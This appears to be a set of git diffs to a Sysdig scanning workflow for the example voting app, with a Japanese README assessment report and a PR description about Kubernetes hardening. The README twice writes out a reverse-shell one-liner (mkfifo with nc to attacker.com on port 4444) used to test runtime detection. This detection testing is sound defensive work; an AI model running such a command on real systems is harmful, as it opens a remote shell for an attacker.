+          curl -LO https://download.sysdig.com/scanning/sysdig-cli-scanner/latest/linux/sysdig-cli-scanner
+          chmod +x sysdig-cli-scanner
+
+      - name: Scan Docker image from archive with Sysdig (binary)
+        run: |
+          ./sysdig-cli-scanner             --standalone             --input-file vote-image.tar             vote-image:ci             --console-log             --detailed-policies-eval             --full-vulns-table             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}
 
       - name: Scan IaC (k8s-specifications)
         run: |
-          docker run --rm             --platform linux/amd64             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             -v ${{ github.workspace }}:/iac             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan /iac/k8s-specifications
+          ./sysdig-cli-scanner             --apiurl ${{ secrets.SYSDIG_API_URL }}             --iac scan ./k8s-specifications             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -9,7 +9,7 @@ on:
 jobs:
   scan:
     runs-on: ubuntu-latest
-    name: Scan vote / worker / result + IaC
+    name: Scan vote / worker / result + IaC (stable, no version pin)
 
     steps:
       - name: Checkout source
@@ -33,7 +33,6 @@ jobs:
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
-          cli-scanner-version: 1.22.3
 
       # Scan worker
       - name: Scan worker image with Sysdig
@@ -43,7 +42,6 @@ jobs:
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
-          cli-scanner-version: 1.22.3
 
       # Scan result
       - name: Scan result image with Sysdig
@@ -53,17 +51,14 @@ jobs:
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
-          cli-scanner-version: 1.22.3
 
-      # Scan IaC
+      # Scan IaC (k8s-specifications)
       - name: Scan Kubernetes IaC manifests
         uses: sysdiglabs/scan-action@v6
-        continue-on-error: true  # IaC scan failure should not block main scan
+        continue-on-error: true
         with:
           mode: iac
           iac-scan-path: k8s-specifications
           sysdig-secure-token: ${{ secrets.SYSDIG_SECURE_TOKEN }}
           sysdig-secure-url: ${{ secrets.SYSDIG_API_URL }}
           stop-on-processing-error: true
-          cli-scanner-version: 1.23.3
-

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -32,7 +32,7 @@ jobs:
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
-          quay.io/sysdig/sysdig-cli-scanner:latest \
+          quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
           --image-archive /tmp/vote-image.tar
 
@@ -41,6 +41,6 @@ jobs:
         docker run --rm \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}:/iac \
-          quay.io/sysdig/sysdig-cli-scanner:latest \
+          quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
           --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -27,12 +27,13 @@ jobs:
         docker build -t vote-image ./vote
         docker save vote-image -o vote-image.tar
 
-    - name: Scan Docker image from archive with Sysdig (v1.24.2)
+    - name: Scan Docker image from archive with Sysdig
       run: |
         docker run --rm \
+　　　　　--platform linux/amd64 \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
-          quay.io/sysdig/sysdig-cli-scanner:1.24.2 \
+          quay.io/sysdig/sysdig-cli-scanner:latest \
           --standalone \
           --input-file /tmp/vote-image.tar \
           vote-image:ci
@@ -40,8 +41,9 @@ jobs:
     - name: Scan IaC (k8s-specifications)
       run: |
         docker run --rm \
+          --platform linux/amd64 \
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}:/iac \
-          quay.io/sysdig/sysdig-cli-scanner:1.24.2 \
+          quay.io/sysdig/sysdig-cli-scanner:latest \
           --apiurl ${{ secrets.SYSDIG_API_URL }} \
           --iac scan /iac/k8s-specifications

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -12,7 +12,7 @@ on:
 
 jobs:
   scan:
-    name: Sysdig Scan Docker + IaC (loaded image method)
+    name: Sysdig Scan Docker + IaC (with docker.sock)
     runs-on: ubuntu-latest
 
     steps:
@@ -25,16 +25,11 @@ jobs:
       - name: Build vote image
         run: |
           docker build -t vote-image ./vote
-          docker save vote-image -o vote-image.tar
+          docker tag vote-image vote-image:ci
 
-      - name: Load and tag image
+      - name: Scan Docker image using docker.sock
         run: |
-          docker load -i vote-image.tar
-          docker tag vote-image:latest vote-image:ci
-
-      - name: Scan Docker image using tag
-        run: |
-          docker run --rm             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             vote-image:ci
+          docker run --rm             -v /var/run/docker.sock:/var/run/docker.sock             -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }}             quay.io/sysdig/sysdig-cli-scanner:latest             --apiurl ${{ secrets.SYSDIG_API_URL }}             vote-image:ci
 
       - name: Scan IaC (k8s-specifications)
         run: |

--- a/.github/workflows/sysdig-scan.yml
+++ b/.github/workflows/sysdig-scan.yml
@@ -33,8 +33,8 @@ jobs:
           -e SECURE_API_TOKEN=${{ secrets.SYSDIG_SECURE_TOKEN }} \
           -v ${{ github.workspace }}/vote-image.tar:/tmp/vote-image.tar \
           quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
-          --apiurl ${{ secrets.SYSDIG_API_URL }} \
-          --image-archive /tmp/vote-image.tar
+          --standalone
+          --input-file /tmp/vote-image.tar
 
     - name: Scan IaC (k8s-specifications)
       run: |

--- a/README.md
+++ b/README.md
@@ -63,3 +63,16 @@ The voting application only accepts one vote per client browser. It does not reg
 This isn't an example of a properly architected perfectly designed distributed app... it's just a simple
 example of the various types of pieces and languages you might see (queues, persistent data, etc), and how to
 deal with them in Docker at a basic level.
+
+
+## 📄 Sysdig Tech Assessment 成果レポート
+
+このリポジトリでは、Sysdig Secure を活用したセキュリティ検証（IaC / CI/CD / Runtime）を段階的に実施しました。
+
+| フェーズ | 内容 | 成果リンク |
+|----------|------|-------------|
+| A        | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) |
+| B        | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) |
+| C        | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) |
+
+成果詳細：[`docs/assessment-report.md`](./docs/assessment-report.md)

--- a/README.md
+++ b/README.md
@@ -65,14 +65,122 @@ example of the various types of pieces and languages you might see (queues, pers
 deal with them in Docker at a basic level.
 
 
-## 📄 Sysdig Tech Assessment 成果レポート
+# 📄 Sysdig TechAssessment - Phase A, B & C 成果レポート
 
 このリポジトリでは、Sysdig Secure を活用したセキュリティ検証（IaC / CI/CD / Runtime）を段階的に実施しました。
 
-| フェーズ | 内容 | 成果リンク |
-|----------|------|-------------|
-| A        | IaC 脆弱性スキャン + 初期Runtime Policy検証 | [assessment-report.md](./docs/assessment-report.md#フェーズa) |
-| B        | GitHub ActionsによるCI統合スキャン | [assessment-report.md](./docs/assessment-report.md#フェーズb) |
-| C        | Reverse ShellによるRuntime Threatの検出 | [assessment-report.md](./docs/assessment-report.md#フェーズc) |
+---
 
-成果詳細：[`docs/assessment-report.md`](./docs/assessment-report.md)
+## 📘 フェーズA：IaCおよびRuntime Policies 初期検証
+
+### ✅ IaC セキュリティスキャン結果（Sysdig CLI Scanner）
+
+- スキャン対象: `k8s-specifications/*.yaml`
+- 使用ツール: `sysdig-cli-scanner:1.22.4`
+- 実行方法:
+
+```bash
+docker run --rm \
+  -e SECURE_API_TOKEN=$SYSDIG_SECURE_TOKEN \
+  -v $PWD:/iac \
+  quay.io/sysdig/sysdig-cli-scanner:1.22.4 \
+  --apiurl https://app.au1.sysdig.com \
+  --iac scan /iac/k8s-specifications
+```
+
+| レベル | 件数 | 内容例 |
+|--------|------|--------|
+| 🔴 High | 25   | RunAsUser=root, writeable rootFS, NET_RAW許可など |
+| 🟠 Medium | 55 | CPU/Memory制限なし, latestタグ, readiness probeなしなど |
+| 🟡 Low   | 40 | runAsNonRoot未設定, liveness未定義など |
+
+### 🛠 修正アクション（IaC）
+
+- `securityContext.runAsUser: 1000`
+- `readOnlyRootFilesystem: true`
+- `capabilities.drop: ["ALL"]`
+- `resources.requests/limits` を追加
+- `livenessProbe`, `readinessProbe` を明示
+- PR #409 にて修正済みYAMLをコミット
+
+### ✅ Runtime Policy 初期実装
+
+- 使用ルール: `Reverse Shell Detected`
+- ポリシータイプ: Workload Policy
+- スコープ: `container.label.io.kubernetes.pod.namespace is default`
+- アクション: `Generate Event`
+- 実行コマンド:
+
+```bash
+kubectl exec -it vote-XXXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f'
+```
+
+- Sysdig Secure UI にて検知成功（イベント/プロセス/ユーザー確認済）
+
+---
+
+## 📘 フェーズB：CI/CD 連携によるセキュリティスキャン
+
+### ✅ 実施内容概要
+
+- GitHub Actions を用いた自動スキャン
+- 対象：Voting App（vote / worker / result）のDockerイメージと IaCファイル
+- 使用アクション：`sysdiglabs/scan-action@v6`
+
+### 🔧 技術構成
+
+- `.github/workflows/sysdig-scan.yml`
+- CLIバージョン：`1.22.3`
+- Secret：`SYSDIG_SECURE_TOKEN`
+- 設定：`continue-on-error: true`
+
+### 🐳 Docker イメージスキャン結果
+
+| サービス | イメージ | 脆弱性数（Critical） | Policy評価 |
+|----------|---------|----------------------|------------|
+| vote     | vote-app | 113（3件）           | ❌ FAILED  |
+| worker   | worker-app | 174（4件）         | ❌ FAILED  |
+| result   | result-app | 119（1件）         | ❌ FAILED  |
+
+### 📄 IaC スキャン結果
+
+| レベル | 件数 | 主な検出内容 |
+|--------|------|----------------|
+| 🔴 High | 25 | serviceAccount未指定, root実行 など |
+| 🟠 Medium | 55 | resource未設定, latestタグなど |
+| 🟡 Low | 40 | liveness/readiness probe未定義 |
+
+---
+
+## 📘 フェーズC：Runtime Policy による脅威検知
+
+### ✅ 実施内容概要
+
+- `Reverse Shell Detected`, `Unexpected Outbound Connection` を有効化
+- namespace=`default` を対象に設定
+- イベント：Generate Event, Capture（Kill optional）
+
+### 🛠 実施ステップ
+
+```bash
+kubectl exec -it vote-XXXXX -n default -- /bin/sh -c 'rm -f /tmp/f; mkfifo /tmp/f; nc attacker.com 4444 < /tmp/f | /bin/sh > /tmp/f'
+```
+
+### 📡 検知ログ（Secure UI）
+
+- Threat：Reverse Shell Detected
+- 実行ユーザー：root
+- プロセス：`nc.openbsd`, `sh`
+- 状態：Open
+- Capture：取得済み
+
+---
+
+## ✅ 結論
+
+- ✅ フェーズA：IaC検知 → PR修正、Runtime Policy初期検知を実証
+- ✅ フェーズB：CI/CD自動スキャンパイプライン構築
+- ✅ フェーズC：Runtime脅威の検出とフォレンジック取得に成功
+
+レポート作成日: 2025-07-21  
+作成者: Higaki（SETechAssessment 参加者）


### PR DESCRIPTION
This pull request applies security best practices to the Kubernetes deployment manifests for the `vote`, `worker`, and `result` components of the example-voting-app.

These changes are part of the Sysdig Technical Assessment – Phase A/B and are informed by the IaC scanning results via sysdig-cli-scanner.

### ✅ Improvements made:

- Set `runAsNonRoot: true` and dropped all capabilities
- Enabled `readOnlyRootFilesystem` for all containers
- Added `resources.limits` and `resources.requests` for CPU and memory
- Introduced `runAsUser`, `runAsGroup`, and `fsGroup` to improve security context isolation

### 🛡️ Benefit:

These changes reduce container privileges and follow the [Sysdig Best Practices](https://docs.sysdig.com/en/docs/administration/policies/kubernetes-security-policies/) for Kubernetes workloads. As a result, future IaC scans are expected to PASS or show reduced high-risk controls.

---

Tested with:

- `sysdig-cli-scanner` v1.22.3 (Docker) + `v1.23.x` (IaC)
- GitHub Actions (see workflow `.github/workflows/sysdig-scan.yml`)

Let me know if further adjustments are needed. Thank you!